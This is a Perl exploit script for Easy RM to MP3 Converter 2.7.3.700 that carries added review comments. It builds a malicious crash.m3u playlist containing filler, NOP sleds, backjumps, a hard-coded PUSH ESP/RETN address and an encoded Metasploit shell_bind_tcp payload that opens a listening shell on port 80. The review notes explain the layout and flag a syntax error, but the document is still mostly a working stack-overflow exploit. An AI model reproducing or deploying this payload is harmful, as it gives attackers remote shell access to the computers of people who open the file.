####################################################################################################################
# Easy RM to MP3 Converter Version 2.7.3.700 2006.09.29 - local exploit with the usage of some fancy backjumps
# thx a lot to peter from corelan for his tut and his help to get this exploit working :)
# visit ... http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
# have fun
# m-1-k-3 (http://www.s3cur1ty.de)
####################################################################################################################
#
# Review summary: this script only writes one file, "crash.m3u", into the
# current directory. Its content is a single line (no newline is ever written)
# of roughly 28 KB built from the fixed filler, NOP and payload pieces below;
# nothing in the script itself touches the network. The payload blob, per the
# generator line further down, is a windows/shell_bind_tcp listener on TCP 80.
# A playlist file of this size and shape (tens of KB of "A"/"D" filler and NOPs,
# no readable path) is easy to flag on the way in.
#
# Review notes on the Perl:
#  - No `use strict; use warnings;`. $shell, $backjump1 and $FILE are undeclared
#    package globals; only $file and $junk are lexicals.
#  - As pasted, the `$junk` expression is missing a `.` at the end of the
#    "stage 3" line, so perl stops with a syntax error before writing anything.
#  - The output handle is a 2-arg, unchecked open without binmode (see the
#    notes at the open/print/close lines at the bottom).

my $file= "crash.m3u";   # output path, relative to the current working directory

#metasm > mov ebp,esp
#"\x89\xe5"
#add esp,-44c
#81c4b4fbffff
# ... fixes the crash of the shellcode ... a bit of magic from peter ;)
# (The two instructions above are the 8-byte prefix at the start of $shell.
#  The author's note says they stop the decoded shellcode from crashing; note
#  that the prefix contains \xff bytes, which were in the badchar list handed
#  to msfencode below - that list only governed the encoded body.)

#msfpayload windows/shell_bind_tcp LPORT=80 R | /opt/metasploit34-dev/msf3/msfencode -b '\x00\xff' -e x86/alpha_mixed -t perl
#[*] x86/alpha_mixed succeeded with size 745 (iteration=1)

# $shell = 8-byte mov/add prefix + 5 NOPs + the alpha_mixed-encoded payload
# (745 bytes per the msfencode output above). Undeclared package global.
$shell= "\x89\xe5\x81\xc4\xb4\xfb\xff\xff" . "\x90" x 5 .
"\x89\xe5\xdb\xd9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x4a\x48\x4d\x59\x43\x30\x43\x30\x45" .
"\x50\x43\x50\x4e\x69\x4a\x45\x46\x51\x4b\x62\x42\x44\x4e" .
"\x6b\x51\x42\x44\x70\x4e\x6b\x51\x42\x44\x4c\x4e\x6b\x50" .
"\x52\x44\x54\x4e\x6b\x50\x72\x51\x38\x46\x6f\x4f\x47\x43" .
"\x7a\x51\x36\x46\x51\x4b\x4f\x46\x51\x4f\x30\x4c\x6c\x47" .
"\x4c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4b\x71\x4a" .
"\x6f\x44\x4d\x45\x51\x48\x47\x4a\x42\x4a\x50\x50\x52\x42" .
"\x77\x4e\x6b\x42\x72\x46\x70\x4e\x6b\x43\x72\x47\x4c\x43" .
"\x31\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4c\x45\x49\x50\x50" .
"\x74\x51\x5a\x45\x51\x4a\x70\x50\x50\x4e\x6b\x47\x38\x46" .
"\x78\x4c\x4b\x43\x68\x45\x70\x43\x31\x4e\x33\x49\x73\x45" .
"\x6c\x42\x69\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44" .
"\x71\x4b\x4f\x44\x71\x4f\x30\x4e\x4c\x4f\x31\x48\x4f\x46" .
"\x6d\x45\x51\x4f\x37\x50\x38\x4b\x50\x50\x75\x49\x64\x45" .
"\x53\x51\x6d\x49\x68\x45\x6b\x43\x4d\x44\x64\x43\x45\x49" .
"\x72\x43\x68\x4e\x6b\x51\x48\x45\x74\x47\x71\x48\x53\x50" .
"\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46" .
"\x61\x49\x43\x4c\x4b\x46\x64\x4e\x6b\x45\x51\x48\x50\x4f" .
"\x79\x42\x64\x45\x74\x47\x54\x43\x6b\x51\x4b\x43\x51\x51" .
"\x49\x51\x4a\x42\x71\x49\x6f\x49\x70\x46\x38\x43\x6f\x42" .
"\x7a\x4e\x6b\x42\x32\x48\x6b\x4b\x36\x51\x4d\x45\x38\x45" .
"\x63\x50\x32\x47\x70\x45\x50\x45\x38\x51\x67\x51\x63\x45" .
"\x62\x43\x6f\x46\x34\x51\x78\x50\x4c\x43\x47\x46\x46\x44" .
"\x47\x49\x6f\x4b\x65\x4e\x58\x4e\x70\x47\x71\x43\x30\x47" .
"\x70\x47\x59\x4b\x74\x43\x64\x42\x70\x51\x78\x51\x39\x4b" .
"\x30\x50\x6b\x47\x70\x49\x6f\x4b\x65\x46\x30\x46\x30\x42" .
"\x70\x46\x30\x51\x50\x50\x50\x43\x70\x42\x70\x51\x78\x49" .
"\x7a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x4b\x65\x4d\x59\x4f" .
"\x37\x44\x71\x49\x4b\x51\x43\x51\x78\x43\x32\x47\x70\x43" .
"\x30\x50\x50\x4b\x39\x4d\x36\x50\x6a\x44\x50\x50\x56\x51" .
"\x47\x51\x78\x4b\x72\x49\x4b\x50\x37\x42\x47\x49\x6f\x4b" .
"\x65\x46\x33\x51\x47\x42\x48\x4c\x77\x4b\x59\x47\x48\x4b" .
"\x4f\x4b\x4f\x4b\x65\x50\x53\x51\x43\x51\x47\x42\x48\x51" .
"\x64\x4a\x4c\x47\x4b\x4b\x51\x4b\x4f\x4e\x35\x42\x77\x4f" .
"\x79\x49\x57\x50\x68\x50\x75\x42\x4e\x50\x4d\x50\x61\x49" .
"\x6f\x4a\x75\x42\x48\x42\x43\x50\x6d\x45\x34\x45\x50\x4e" .
"\x69\x49\x73\x46\x37\x46\x37\x43\x67\x45\x61\x4a\x56\x51" .
"\x7a\x47\x62\x42\x79\x42\x76\x49\x72\x49\x6d\x51\x76\x4a" .
"\x67\x42\x64\x44\x64\x47\x4c\x45\x51\x45\x51\x4e\x6d\x42" .
"\x64\x44\x64\x44\x50\x4f\x36\x43\x30\x42\x64\x42\x74\x46" .
"\x30\x51\x46\x42\x76\x51\x46\x43\x76\x51\x46\x50\x4e\x42" .
"\x76\x51\x46\x43\x63\x50\x56\x42\x48\x50\x79\x4a\x6c\x47" .
"\x4f\x4e\x66\x4b\x4f\x4b\x65\x4c\x49\x49\x70\x42\x6e\x46" .
"\x36\x43\x76\x49\x6f\x46\x50\x43\x58\x46\x68\x4e\x67\x45" .
"\x4d\x45\x30\x4b\x4f\x4e\x35\x4d\x6b\x4a\x50\x4f\x45\x4f" .
"\x52\x46\x36\x45\x38\x4e\x46\x4e\x75\x4d\x6d\x4f\x6d\x4b" .
"\x4f\x4a\x75\x47\x4c\x47\x76\x51\x6c\x46\x6a\x4b\x30\x4b" .
"\x4b\x4d\x30\x50\x75\x47\x75\x4d\x6b\x43\x77\x45\x43\x43" .
"\x42\x50\x6f\x43\x5a\x45\x50\x43\x63\x49\x6f\x4e\x35\x45" .
"\x5a\x41\x41";


# 5-byte x86 near jmp (opcode E9) with a negative rel32 displacement; per the
# "stage 2" comment below it is meant to land in the NOP padding that precedes
# $shell. Undeclared package global.
$backjump1= "\xE9\xE9\xFC\xFF\xFF"; # 5 bytes

# File content, in write order: filler, NOP sled, $shell, NOPs, the far backjump,
# more NOPs, the fixed PUSH ESP / RETN address (presumably the saved-return-address
# slot), 4 garbage bytes, the short backjump, and an unused tail.
# NOTE(review): the "stage 3" line below ends with `x 7` directly followed by
# the comment - there is no `.` before the next line, so this is a syntax error
# as pasted.
my $junk= "\x41" x 25026 .
"\x44" x 125 . "\x90" x 10 . $shell . "\x90" x 7 # stage 3 - shellcode (missing trailing `.` here)
"\x90" x 20 . $backjump1 . "\x90" x 105 .       # stage 2 - far backjmp
"\x58\xb0\x01\x10" .            # push esp - retn  (0x1001B058 little-endian, see the msrmfilter03.dll note below)
"\x90" x 4 .                # some garbage
"\xeb\x80" .                # stage 1 - short backjmp (2-byte jmp rel8, 0x80 = -128)
"\x00" x 4 . "\x44" x 1930;     # we would not use this buffer!  (trailing bytes, unused per the author)

#msrmfilter03.dll - no dll rebase
#1001B058   54               PUSH ESP
#1001B059   C3               RETN
# A hard-coded address like this only works because the module loads at a
# fixed base ("no dll rebase"); a module built with rebasing/ASLR support
# would not be usable this way.

# NOTE(review): 2-arg open on an undeclared global handle, return value not
# checked; the idiomatic form is `open my $fh, '>', $file or die "open $file: $!"`.
# $file is a fixed literal here, so the mode-injection risk of 2-arg open does
# not arise in this script, but a failed open is silent.
open($FILE,">$file");
# Raw bytes through a text-mode handle: there is no binmode($FILE). The "$junk"
# interpolation is redundant ($junk is already a string).
# NOTE(review): on Windows a \x0a byte would be rewritten to \x0d\x0a; none is
# visible in the blob above, but confirm if the payload is regenerated.
print $FILE "$junk";
close($FILE);   # unchecked; buffered write errors would surface here
print "m3u File Created successfully\n";   # printed even if the open failed